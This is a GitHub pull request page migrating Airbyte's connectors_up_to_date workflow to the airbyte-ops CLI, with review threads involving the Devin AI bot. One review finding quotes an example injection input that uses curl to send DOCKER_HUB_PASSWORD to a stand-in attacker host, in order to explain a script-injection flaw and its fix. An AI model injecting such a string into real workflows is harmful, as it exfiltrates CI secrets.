Skip to content

ci(connectors): migrate connectors_up_to_date workflow from airbyte-ci to airbyte-ops#75524

Draft
Aaron ("AJ") Steers (aaronsteers) wants to merge 5 commits intomasterfrom
devin/1774569098-migrate-up-to-date-to-ops
Draft

ci(connectors): migrate connectors_up_to_date workflow from airbyte-ci to airbyte-ops#75524
Aaron ("AJ") Steers (aaronsteers) wants to merge 5 commits intomasterfrom
devin/1774569098-migrate-up-to-date-to-ops

Conversation

@aaronsteers
Copy link
Member

@aaronsteers Aaron ("AJ") Steers (aaronsteers) commented Mar 26, 2026

What

Migrates the connectors_up_to_date workflow away from the legacy airbyte-ci Dagger-based tooling to the airbyte-ops CLI (airbyte-internal-ops). This is the second half of a two-PR effort:

  1. airbytehq/airbyte-ops-mcp#624 — adds --connectors-filter flag to the ops CLI (merged)
  2. This PR — rewrites the workflow to use the ops CLI and native GitHub Actions steps

⚠️ This PR is not yet fully runnable. Three capabilities are still missing and tracked as TK-TODO items with linked issues. All other steps use existing tools and should work once merged.

How

Connector selection (fully migrated)

Replaces the airbyte-ci connectors list + --metadata-query approach with a three-call pattern:

  1. Sources — all support levels, Python/low-code/manifest-only, excluding source-declarative-manifest
  2. Destinations — certified only, same language filters
  3. Combine — passes both CSV lists to --connectors-filter and outputs json-gh-matrix

This makes the AND/OR filter semantics explicit and readable, replacing the opaque simpleeval metadata query.

Up-to-date execution (individual steps, mostly implemented)

The monolithic airbyte-ci connectors up-to-date Dagger pipeline is replaced with individual workflow steps using existing tools and native GitHub Actions:

Step Implementation Status
Create/update GitHub PR (early, for PR number) peter-evans/create-pull-request with auto-merge label
Run poetry update (Python connectors) Conditional on CONNECTOR_LANGUAGE == 'python'; setup-python + install-poetry + poetry update --lock
Bump CDK dependency airbyte-ops local connector bump-cdk ❌ TK-TODO (airbytehq/airbyte-ops-mcp#627)
Bump connector version (patch) + changelog airbyte-ops local connector bump-version --bump-type patch --changelog-message --pr-number
Update base image in metadata.yaml airbyte-ops local connector bump-base-image ❌ TK-TODO (airbytehq/airbyte-ops-mcp#626)
Push changes to PR branch git add / git commit / git push
Mark PR ready for review gh pr ready
Enable auto-merge gh pr merge --squash --auto

Future: inline poetry update steps will be replaced by airbyte-ops local connector bump-external-dependencies once implemented (airbytehq/airbyte-ops-mcp#628).

Key design choice: The PR is created first (as a draft) so we have a PR number to pass into bump-version for the changelog entry. Changes are committed and pushed to the PR branch afterward, then the PR is marked ready for review.

Other changes

  • Removes Dagger-specific secrets (cloud token, S3 cache, Sentry DSN, GCP GSM)
  • Adds contents: write permission (needed for branch/PR operations)
  • Adds Docker Hub login step (needed for base image resolution)
  • Installs ops CLI via uv tool install airbyte-internal-ops
  • Configures git author as octavia-bot-hoard GitHub App (pattern from auto-upgrade-certified-connectors-cdk.yml)
  • Job-level env: block with CONNECTOR_NAME, CONNECTOR_DIR, CONNECTOR_LANGUAGE from matrix values

Tracked TK-TODOs

Each remaining gap is tracked as a separate issue in the ops repo and linked inline via TK-TODO(url) comments:

Capability Issue Notes
bump-base-image airbytehq/airbyte-ops-mcp#626 Update base image tag in metadata.yaml
bump-cdk airbytehq/airbyte-ops-mcp#627 Bump CDK dependency; supports --latest to ignore constraints
bump-external-dependencies airbytehq/airbyte-ops-mcp#628 Replace inline poetry update with ops CLI command

These three operations should be independently toggleable via workflow inputs so a failure in one does not block the others.

Review guide

  1. .github/workflows/connectors_up_to_date.yml — the only file changed

Reviewer checklist:

  • peter-evans/create-pull-request ordering: The action is called before poetry update and bump-version modify the working tree. Confirm that it either creates an empty PR (returning a PR number) or that the branch already exists from a prior run — otherwise subsequent steps won't have a PR_NUMBER.
  • if: env.CONNECTOR_LANGUAGE == 'python': Verify this GitHub Actions expression correctly evaluates job-level env vars in step if conditions.
  • Manual git push after create-pull-request: Step 5b does git add / git commit / git push to the branch created by peter-evans/create-pull-request. Confirm these don't conflict with the action's branch management.
  • Remaining TK-TODOs: bump-base-image and bump-cdk will fail at runtime since the CLI commands don't exist. The job has continue-on-error: true, so the matrix entry won't block the overall workflow, but downstream steps within that job (push, ready, auto-merge) may be skipped.
  • Matrix format change: The old workflow batched connectors into groups of 25. The new json-gh-matrix format produces one matrix entry per connector. The step name still says "25 connectors per job" — this label is misleading and should be updated.

User Impact

No immediate user impact — workflow will not run successfully until the bump-base-image and bump-cdk commands are implemented in airbyte-ops. When complete, the behavioral change is:

  • Destinations are now filtered to certified-only (previously all support levels were included)
  • Removes dependency on Dagger engine for the up-to-date pipeline

Can this PR be safely reverted and rolled back?

  • YES 💚

Link to Devin session: https://app.devin.ai/sessions/fac9d893990a479d897e6be184945942
Requested by: Aaron ("AJ") Steers (@aaronsteers)


Open with Devin

…i to airbyte-ops

Replace the legacy airbyte-ci Dagger-based connector selection with
the airbyte-ops CLI three-call pattern:
  1. List sources (all support levels)
  2. List certified destinations
  3. Combine via --connectors-filter and output json-gh-matrix

The up-to-date execution step uses a TK-TODO pseudocode call to
`airbyte-ops local connector up-to-date` which does not exist yet.
See PR description for the full gap analysis.

Co-Authored-By: AJ Steers <aj@airbyte.io>
@devin-ai-integration
Copy link
Contributor

🤖 Devin AI Engineer

I'll be helping with this pull request! Here's what you should know:

✅ I will automatically:

  • Address comments on this PR. Add '(aside)' to your comment to have me ignore it.
  • Look at CI failures and help fix them

Note: I can only respond to comments from users who have write access to this repository.

⚙️ Control Options:

  • Disable automatic comment and CI monitoring

@github-actions
Copy link
Contributor

👋 Greetings, Airbyte Team Member!

Here are some helpful tips and reminders for your convenience.

💡 Show Tips and Tricks

PR Slash Commands

Airbyte Maintainers (that's you!) can execute the following slash commands on your PR:

  • 🛠️ Quick Fixes
    • /format-fix - Fixes most formatting issues.
    • /bump-version - Bumps connector versions, scraping changelog description from the PR title.
  • ❇️ AI Testing and Review (internal link: AI-SDLC Docs):
    • /ai-prove-fix - Runs prerelease readiness checks, including testing against customer connections.
    • /ai-canary-prerelease - Rolls out prerelease to 5-10 connections for canary testing.
    • /ai-review - AI-powered PR review for connector safety and quality gates.
  • 🚀 Connector Releases:
    • /publish-connectors-prerelease - Publishes pre-release connector builds (tagged as {version}-preview.{git-sha}) for all modified connectors in the PR.
    • /bump-progressive-rollout-version - Bumps connector version with an RC suffix (2.16.10-rc.1) for progressive rollouts (enableProgressiveRollout: true).
      • Example: /bump-progressive-rollout-version changelog="Add new feature for progressive rollout"
  • ☕️ JVM connectors:
    • /update-connector-cdk-version connector=<CONNECTOR_NAME> - Updates the specified connector to the latest CDK version.
      Example: /update-connector-cdk-version connector=destination-bigquery
  • 🐍 Python connectors:
    • /poe connector source-example lock - Run the Poe lock task on the source-example connector, committing the results back to the branch.
    • /poe source example lock - Alias for /poe connector source-example lock.
    • /poe source example use-cdk-branch my/branch - Pin the source-example CDK reference to the branch name specified.
    • /poe source example use-cdk-latest - Update the source-example CDK dependency to the latest available version.
  • ⚙️ Admin commands:
    • /force-merge reason="<REASON>" - Force merges the PR using admin privileges, bypassing CI checks. Requires a reason.
      Example: /force-merge reason="CI is flaky, tests pass locally"
📚 Show Repo Guidance

Helpful Resources

📝 Edit this welcome message.

Comment on lines +36 to +46
SOURCES=$(
airbyte-ops local connector list \
--repo-path "$GITHUB_WORKSPACE" \
--connector-type=source \
--language python --language low-code --language manifest-only \
--exclude-connectors=source-declarative-manifest \
${{ github.event.inputs.connectors-options }} \
--output-format=csv
)
echo "Sources: $SOURCES"
echo "sources=$SOURCES" >> "$GITHUB_OUTPUT"

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

You can make this simpler with the tee -a convention. Make sure you are using the create-github-action skill

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Fixed in 6d4f015:

  1. Switched to tee -a $GITHUB_OUTPUT (per skill guideline OSS Setup #4) — removes the separate echo "Sources: ..." line
  2. Moved ${{ github.event.inputs.connectors-options }} into env: CONNECTOR_OPTIONS to prevent script injection (per skill guideline configuration documentation #5)

Devin session

Comment on lines +51 to +62
run: |
DESTINATIONS=$(
airbyte-ops local connector list \
--repo-path "$GITHUB_WORKSPACE" \
--connector-type=destination \
--certified-only \
--language python --language low-code --language manifest-only \
${{ github.event.inputs.connectors-options }} \
--output-format=csv
)
echo "Destinations: $DESTINATIONS"
echo "destinations=$DESTINATIONS" >> "$GITHUB_OUTPUT"

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Ditto

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Fixed in the same commit (6d4f015) — same tee -a + env: pattern applied to the destinations step.


Devin session

Copy link
Contributor

@devin-ai-integration devin-ai-integration bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Devin Review found 2 potential issues.

View 4 additional findings in Devin Review.

Open in Devin Review

--connector-type=source \
--language python --language low-code --language manifest-only \
--exclude-connectors=source-declarative-manifest \
${{ github.event.inputs.connectors-options }} \
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🔴 Script injection via unsanitized workflow_dispatch input in shell run blocks

The ${{ github.event.inputs.connectors-options }} expression is directly interpolated into run: shell scripts at lines 42 and 58. GitHub Actions evaluates ${{ }} expressions before the shell executes, so a malicious or accidental input like ; curl attacker.com/steal?t=$DOCKER_HUB_PASSWORD # would break out of the command and execute arbitrary code with access to the job's secrets (DOCKER_HUB_PASSWORD, etc.). The safe pattern is to assign the expression to an environment variable (env: OPTIONS: ${{ github.event.inputs.connectors-options }}) and reference "$OPTIONS" in the shell, which prevents shell metacharacter interpretation. The old workflow was not vulnerable to this because the input was passed as an action with: parameter to the run-airbyte-ci composite action, not interpolated directly into a shell script.

Prompt for agents
In .github/workflows/connectors_up_to_date.yml, the user-controlled input `github.event.inputs.connectors-options` is interpolated directly into `run:` shell scripts at two locations (lines 42 and 58). This is a script injection vulnerability. Fix both occurrences by:

1. For the step 'List source connectors' (around line 33), add an `env:` block:
   env:
     CONNECTOR_OPTIONS: ${{ github.event.inputs.connectors-options }}
   And change line 42 from:
     ${{ github.event.inputs.connectors-options }} \
   to:
     $CONNECTOR_OPTIONS \

2. For the step 'List destination connectors' (around line 49), add the same `env:` block:
   env:
     CONNECTOR_OPTIONS: ${{ github.event.inputs.connectors-options }}
   And change line 58 from:
     ${{ github.event.inputs.connectors-options }} \
   to:
     $CONNECTOR_OPTIONS \

This ensures the input is passed through an environment variable rather than direct shell interpolation, preventing command injection.
Open in Devin Review

Was this helpful? React with 👍 or 👎 to provide feedback.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Good catch — fixed in 6d4f015. Both occurrences now pass the input via env: CONNECTOR_OPTIONS and reference $CONNECTOR_OPTIONS in the shell, preventing expression injection.


Devin session

Comment on lines +67 to +87
run: |
matrix=$(jq -c -r '{include: [.[] | "--name=" + .] | to_entries | group_by(.key / 25 | floor) | map(map(.value) | {"connector_names": join(" ")})}' selected_connectors.json)
echo "generated_matrix=$matrix" >> $GITHUB_OUTPUT
SOURCES="${{ steps.list-sources.outputs.sources }}"
DESTINATIONS="${{ steps.list-destinations.outputs.destinations }}"

# Combine sources and destinations, then generate matrix via json-gh-matrix
COMBINED=""
if [ -n "$SOURCES" ] && [ -n "$DESTINATIONS" ]; then
COMBINED="${SOURCES},${DESTINATIONS}"
elif [ -n "$SOURCES" ]; then
COMBINED="$SOURCES"
else
COMBINED="$DESTINATIONS"
fi

MATRIX=$(
airbyte-ops local connector list \
--repo-path "$GITHUB_WORKSPACE" \
--connectors-filter="$COMBINED" \
--output-format=json-gh-matrix
)
echo "generated_matrix=$MATRIX" >> "$GITHUB_OUTPUT"

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Ditto this can be a one-liner that receives the prior steps' inputs inline.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Fixed in 6d4f015 — collapsed to a single echo | tee -a that inlines the prior steps' outputs directly:

run: |
  echo "generated_matrix=$( \
    airbyte-ops local connector list \
      --repo-path "$GITHUB_WORKSPACE" \
      --connectors-filter="${{ steps.list-sources.outputs.sources }},${{ steps.list-destinations.outputs.destinations }}" \
      --output-format=json-gh-matrix \
  )" | tee -a $GITHUB_OUTPUT

No more bash if/elif/else branching (per skill guideline #2). If one list is empty, the leading/trailing comma in --connectors-filter is harmless — the CLI's set() splitting filters out empty strings.


Devin session

…atrix step

- Use tee -a  for all output vars (skill guideline #4)
- Pass workflow_dispatch input via env: to prevent script injection (skill guideline #5)
- Simplify generate_matrix to a one-liner receiving prior steps inline
- Remove bash if/elif/else branching (skill guideline #2)

Co-Authored-By: AJ Steers <aj@airbyte.io>
…ECTOR_LANGUAGE from matrix

Co-Authored-By: AJ Steers <aj@airbyte.io>
Comment on lines +120 to +125
# 1. Update base image in metadata.yaml to the latest stable tag
# 2. Run `poetry update` (for Python/Poetry connectors)
# 3. Bump connector version (patch)
# 4. Add changelog entry ("Update dependencies")
# 5. Create or update a GitHub PR with the changes
# 6. Optionally set auto-merge label on the PR

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

We can tackle most of these already without code changes to ops CLI.

1. Update base image in metadata.yaml to the latest stable tag

Create as dedicated step, but move towards end of process. Imagined CLI will be something like:

airbyte-ops local connector bump-base-image

2. Run poetry update (for Python/Poetry connectors)

You can do this already.

Simply add two steps both conditional 'if' on the language being python. First steps sets up Poetry and second step runs poetry update.

3. Bump connector version (patch)

4. Add changelog entry ("Update dependencies")

As you already hinted, we can do this already. Just call the bump-version CLI we already have and pass it an explicit changelog string.

5. Create or update a GitHub PR with the changes

We have patterns to do this already using native github actions. You'll want to do it twice: once up top so that you have a PR number to pass into the bump-version so it can use a (known) PR number in the changelog.

6. Optionally set auto-merge label on the PR

Again, we have github actions examples for your to this already natively. (1) There are labels we can add and (2) there's precedent for setting GitHub's native auto-merge. (We can just do both.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Implemented in ca967db — replaced the monolithic up-to-date pseudocode with individual workflow steps per your guidance:

  1. Git author configoctavia-bot-hoard pattern (from auto-upgrade-certified-connectors-cdk.yml)
  2. Step 5apeter-evans/create-pull-request (early, to get PR number for changelog). Creates draft PR with auto-merge label.
  3. Step 2poetry update --lock conditional on CONNECTOR_LANGUAGE == 'python' (setup-python + install-poetry)
  4. Steps 3+4airbyte-ops local connector bump-version --bump-type patch --changelog-message "Update dependencies" --pr-number "$PR_NUMBER"
  5. Step 1airbyte-ops local connector bump-base-imagestill TK-TODO (command doesn't exist yet), placed near end per your guidance
  6. Step 5bgit add / git commit / git push to the PR branch, then gh pr ready
  7. Step 6gh pr merge "$PR_NUMBER" --squash --auto (native auto-merge)

Only remaining TK-TODO: bump-base-image CLI command.


Devin session

…teps

Per AJ's guidance, replaces the single 'airbyte-ops local connector up-to-date'
pseudocode call with individual workflow steps:

- Step 5a: Create/update PR via peter-evans/create-pull-request (early, for PR number)
- Step 2: poetry update (conditional on CONNECTOR_LANGUAGE == 'python')
- Steps 3+4: bump-version with --changelog-message and --pr-number
- Step 1: bump-base-image (TK-TODO, dedicated step near end)
- Step 5b: Push changes back to PR branch
- Step 6: auto-merge label (via create-pull-request) + gh pr merge --squash --auto

Also adds git author config (octavia-bot-hoard pattern from auto-upgrade-certified-connectors-cdk.yml)
and marks PR ready for review after all changes are pushed.

Only remaining TK-TODO: airbyte-ops local connector bump-base-image (does not exist yet).

Co-Authored-By: AJ Steers <aj@airbyte.io>
Comment on lines 11 to +14
inputs:
connectors-options:
description: "Options to pass to the 'airbyte-ci connectors' command group."
default: "--language=python --language=low-code --language=manifest-only"
description: "Extra flags to pass to `airbyte-ops local connector list` (e.g. --name=source-github)."
default: ""

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

We should add additional optional workflow inputs: bump-base-image, bump-cdk, and bump-external-dependencies. These can all be 'true' or 'false', defaulting to 'true'. And 'bump-cdk' can also be 'latest' which would ignore any existing CDK constraints and instead bump all the way to the latest.

However, doing so is probably out of scope for this PR. Please log an issue in the ops repo to add capability to support this. This would resolve a long-standing issue where a failed image bump can block the CDK from being updated, and vice versa. CDK updates are most relevant for behavioral and bug fixes, whereas image updates are most relevant for security patches. Both are important and we want one to be able to pass even if the other is blocked.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Agreed this is out of scope for this PR. Logged as https://github.com/airbytehq/airbyte-ops-mcp/issues/625 — covers the bump-base-image, bump-cdk, and bump-external-dependencies workflow inputs and the rationale for independent failure handling.


Devin session

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Created three separate issues in the ops repo and added TK-TODO(url) references in the workflow:

  1. airbytehq/airbyte-ops-mcp#626bump-base-image: Implement CLI command to update base image in metadata.yaml
  2. airbytehq/airbyte-ops-mcp#627bump-cdk: Implement CLI command to bump CDK dependency (with --latest option)
  3. airbytehq/airbyte-ops-mcp#628bump-external-dependencies: Implement CLI command for external dependency updates

Closed the combined airbytehq/airbyte-ops-mcp#625 in favor of these three.

Each TK-TODO comment in the workflow now links to its tracking issue.


Devin session

Co-Authored-By: AJ Steers <aj@airbyte.io>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant